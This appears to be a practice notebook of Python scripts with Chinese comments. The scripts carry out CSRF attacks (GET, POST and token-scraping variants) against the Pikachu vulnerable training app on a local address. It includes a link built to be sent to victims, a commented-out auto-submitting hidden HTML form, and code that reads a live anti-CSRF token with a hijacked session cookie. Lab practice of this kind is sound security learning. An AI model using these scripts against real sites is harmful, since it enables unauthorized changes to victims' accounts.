#与get相似,只是修改了一些请求方式#这个漏洞产生的验证就是token实时验证,以及前端存在的Cookie验证,需要验证两个自编CSRF(GET),
import requests
from urllib.parse import urlencode
target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php"
check_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfget/csrf_get.php" #后续检测是否修改
payload = {
"sex":"girl",
"phonenum":"123456",
"add":"CSRF执行成功",
"email":"123.COM",
"submit":"submit"
}
query_str = urlencode(payload)#因为+号前后要保持类型一致,需要对字典进行urlencode()编码一下
alert_target = target_url + "?" + query_str
print(f"需要发送给用户的链接为:{alert_target}")
#模仿用户被攻击
#用户点击被特意构造的payload
headers = {
"Cookie":"PHPSESSID=df0u2o787mgfgc0avf392ksd7g"
}
requests.get(target_url, params=payload, headers=headers )
resp = requests.get(check_url,headers=headers)
print("[+] 注入完成 ")
print("[+] 检查注入是否成功: ","CSRF执行成功" in resp.text)CSRF(POST),
#与get相似,只是修改了一些请求方式
import requests
target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php"
get_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post.php"
payload = {
"sex":"girl",
"phonenum":"123456",
"add":"CSRF的POST攻击",
"email":"qq.com",
"submit":"submit"
}
#构造攻击的url,模仿被攻击
Session = requests.Session()
headers ={
"Cookie":"PHPSESSID=49mmcmofpdtoh0vn7jvkoj13r2"
}
requests.post(target_url, data=payload, headers=headers)
#
resp = requests.get(get_url, headers=headers)
print("[+] 攻击完成 ")
if "123456" in resp.text:
print("[+] 查看是否注入成功! ")
else:
print("[-] 注入失败 !" )CSRF(token)
#这个漏洞产生的验证就是token实时验证,以及前端存在的Cookie验证,需要验证两个
"""
get构造
# 拼接成可攻击的URL
evil_url = target_url + "?" + urlencode(payload)
payload = target_ul + "?" + urlencode(payload)
"""
import requests
import re
# target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get_edit.php"
#
# payload = {
# "sex":"girl",
# "phonenum":"123456",
# "add":"CSRF-token",
# "email":"321@qq.com",
# "submit":"submit"
# }
#
# html = '''
# <form action="http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
# <input type="hidden" name="sex" value="girl">
# <input type="hidden" name="phonenum" value="123456">
# <input type="hidden" name="add" value="CSRF-POST">
# <input type="hidden" name="email" value="123@qq.com">
# <input type="hidden" name="submit" value="submit">
# </form>
# <script>document.forms[0].submit()</script>
# '''
#
# with open("CSRF_token.html","w",encoding = "utf-8") as f:
# f.write(html)
#
# print("[+] 攻击脚本已写好CSRF_token.html")
#假设中招了
target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get_edit.php"
get_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get.php"
session = requests.Session()
headers = {
"Cookie": "PHPSESSID=if9t2mbpc5c5rf83p1slcn7748"
}
session.get(get_url, headers=headers)
target_get = session.get(url=target_url, headers=headers)
token = re.search(r'name="token" value="(.*?)"',target_get.text).group(1)
print(f"[+] 已获取实时Token:{token}")
payload = {
"sex":"girl",
"phonenum":"123456",
"add":"CSRF-token",
"email":"321@qq.com",
"token":token,
"submit":"submit"
}
# resp = requests.get(get_url,headers=headers)
session.post(url=target_url, data=payload, headers=headers)
session.get(target_url, headers=headers)
resp = session.get(url=get_url, headers=headers)
print("[+] 注入成功")
print("[+] 检查测是否正常注入: ", "CSRF-token" in resp.text)